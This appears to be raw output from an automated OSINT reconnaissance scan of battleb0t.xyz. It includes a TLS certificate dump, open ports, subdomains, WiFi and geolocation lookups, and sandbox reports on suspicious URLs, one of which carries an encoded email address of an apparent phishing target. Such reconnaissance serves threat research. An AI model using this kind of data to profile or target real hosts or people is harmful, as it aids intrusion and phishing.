Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
27:d3:d1:3f:37:d1:a6:d4:dd:5d:21:63:b2:ea:b4:66:27:a6:
fc:15:e2:cd:f0:1a:81:1d:a4:76:d3:26:d6:1f:73:ac:91:e9:
1b:30:5e:03:57:a4:78:5c:1c:9b:32:48:a5:13:6e:fe:4d:2c:
ca:7f:a2:ec:c6:08:67:8d:10:3f:b8:48:53:9b:ab:31:8a:39:
5b:be:de:39:48:27:70:4b:53:85:35:c6:dd:69:ba:94:7b:fe:
33:d6:dc:3e:93:fb:07:c5:1d:2d:db:7b:81:84:0d:f1:31:75:
81:6c:52:e8:a4:f2:94:95:1d:51:50:82:97:37:d5:63:3a:17:
d6:47:90:48:19:2f:01:55:5c:4e:50:b0:6b:36:d6:b3:1f:43:
62:1c:b5:b3:7c:5c:47:78:0f:ba:ae:0b:44:f3:88:f9:26:67:
58:1c:81:8c:05:40:88:56:f9:30:44:64:32:06:0f:52:c3:de:
74:23:e1:51:9e:b3:c2:ea:ae:7b:71:42:02:db:c3:89:ea:af:
b4:cd:24:fe:07:e3:e4:d4:76:9d:9d:ea:3f:83:76:ca:50:69:
73:c4:c1:63:b7:2e:f4:26:47:bc:f1:48:fa:81:d9:4e:df:bc:
18:e1:6a:4b:93:17:ed:e0:1a:a0:b0:88:53:7e:d3:8b:c4:7a:
7e:4b:d4:44
| battleb0t.xyz |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:8443 | 188.114.96.0/24 |
| 2023-05-12 02:49:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeibeav&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:6664:120:WilError_01"\n "Local\\SM0:7604:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7604:120:WilError_01"\n "Local\\SM0:7604:120:WilError_01"\n "Local\\SM0:6664:304:WilStaging_02"\n "SM0:6664:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:6664:304:WilStaging_02"\n "Local\\SM0:6664:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6664:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, 
u'description': u'"172.217.12.97:443"\n "185.199.110.153:443"\n "69.16.175.10:443"\n "172.217.164.99:443"\n "142.250.191.78:443"\n "142.251.46.170:443"\n "172.217.12.99:443"\n "209.94.90.1:443"\n "142.251.214.142:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeibeavvyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi.ipfs.dweb.link"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00006664]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\edge_driver.js]- [targetUID: 00000000-00006664]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006664]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 97180"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "GIF image data version 89a 64 x 64"- [targetUID: N/A]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.8\\edge_autofill_field_data.json]- [targetUID: 
00000000-00006664]\n "7a1fdcd3-4d20-482f-8d7a-33c2f9952216.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7a1fdcd3-4d20-482f-8d7a-33c2f9952216.tmp]- [targetUID: 00000000-00006664]\n "f_00023d" has type "Web Open Font Format (Version 2) TrueType length 71896 version 4.393"- [targetUID: N/A]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6664_267374355\\product_page.js]- [targetUID: 00000000-00006664]\n "edge_autofill_global_block_list.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.8\\edge_autofill_global_block_list.json]- [targetUID: 00000000-00006664]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.6\\deny_domains.list]- [targetUID: 00000000-00006664]\n "9a3a6287a4dba55d_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9a3a6287a4dba55d_0]- [targetUID: 00000000-00006664]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\manifest.json]- [targetUID: 00000000-00006664]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00001600]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2023.3.1\\crl-set]- [targetUID: 00000000-00006664]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00006664]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%TEMP%\\6664_267374355\\manifest.fingerprint]- [targetUID: 00000000-00006664]\n "873647c0-9469-42e0-97e2-a93757408a94.tmp" has type "UTF-8 Unicode text with very long 
lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\873647c0-9469-42e0-97e2-a93757408a94.tmp]- [targetUID: 00000000-00006664]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00006664]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeibeav&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "Math.PI/180"\n Pattern match: "https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"\n Pattern match: 
"vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeibeav&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp"\n Pattern match: "https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-lin"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.191.78"\n "UDP connection to 172.217.164.99"\n "UDP connection to 142.251.46.170"\n "UDP connection to 142.251.214.142"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\edge_driver.js]- [targetUID: 00000000-00006664]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6664_267374355\\product_page.js]- [targetUID: 00000000-00006664]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\6664_1337468108\\adblock_snippet.js]- [targetUID: 00000000-00006664]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\shopping.js]- [targetUID: 00000000-00006664]\n "shoppingfre.js" has type 
"UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6664_267374355\\shoppingfre.js]- [targetUID: 00000000-00006664]\n "edge_checkout_page_validator.js" has type "Unknown"- Location: [%TEMP%\\6664_267374355\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006664]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\6664_267374355\\edge_tracking_page_validator.js]- [targetUID: 00000000-00006664]\n "auto_ | 185.199.110.153 |
| 2023-05-12 02:54:20 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8200::c8:80 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:33:48 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif [binary string dump omitted] | https://pics.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 02:58:47 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DbXlldW5nQHRlc2xhLmNvbQ%3D%3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3fc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_3fc_IESQMMUTEX_0_519"\n "IsoScope_3fc_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_3fc_IE_EarlyTabStart_0xc84_Mutex"\n "IsoScope_3fc_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_3fc_ConnHashTable<1020>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, 
u'type': 7, u'description': u'"3.214.28.209:443"\n "65.8.165.51:80"\n "65.8.165.104:80"\n "65.8.165.23:80"\n "65.8.165.88:80"\n "34.74.170.74:443"\n "65.8.158.81:443"\n "142.251.211.227:443"\n "142.250.217.106:443"\n "142.251.211.227:80"\n "142.251.215.227:443"\n "52.95.155.94:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"jsv3.recruitics.com"\n "o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "ocsp.pki.goog"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "H97NHH5Q.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H97NHH5Q.txt]- [targetUID: 
00000000-00001020]\n Dropped file: "LQDJU2M7.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LQDJU2M7.txt]- [targetUID: 00000000-00001020]\n Dropped file: "DYMZMYB9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DYMZMYB9.txt]- [targetUID: 00000000-00003024]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_DF18B54C-3E77-11ED-BA58-0800272A2F3E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "www.recaptcha_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E]- [targetUID: 00000000-00003024]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001020]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003024]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003024]\n "H97NHH5Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H97NHH5Q.txt]- [targetUID: 00000000-00001020]\n "~DF1E50A457EB0DA7FD.TMP" has type "data"- Location: [%TEMP%\\~DF1E50A457EB0DA7FD.TMP]- [targetUID: 00000000-00001020]\n "E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8]- [targetUID: 00000000-00003024]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001020]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003024]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003024]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001020]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DbXlldW5nQHRlc2xhLmNvbQ%3D%3D"\n Pattern match: "https://jsv3.recruitics.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: 
Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic match: "ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEAcWfhO7yUD4HiZydfoHjso%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEASVeeR7RvTclo39SniAB8E%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"\n Heuristic match: "jsv3.recruitics.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': No | 34.74.170.74 |
| 2023-05-12 03:09:00 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.95 | 87.248.157.102 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=nuke.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:12:10 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Netcraft is an Internet services company based in Bath, Somerset, England. The company provides cybercrime disruption services across a range of industries. | baffin.netcraft.com |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://use.fontawesome.com/9dfc16ed6b.js | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F0:36:D7) | 34.0544, -118.244 |
| 2023-05-12 02:46:30 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 35.229.48.116 |
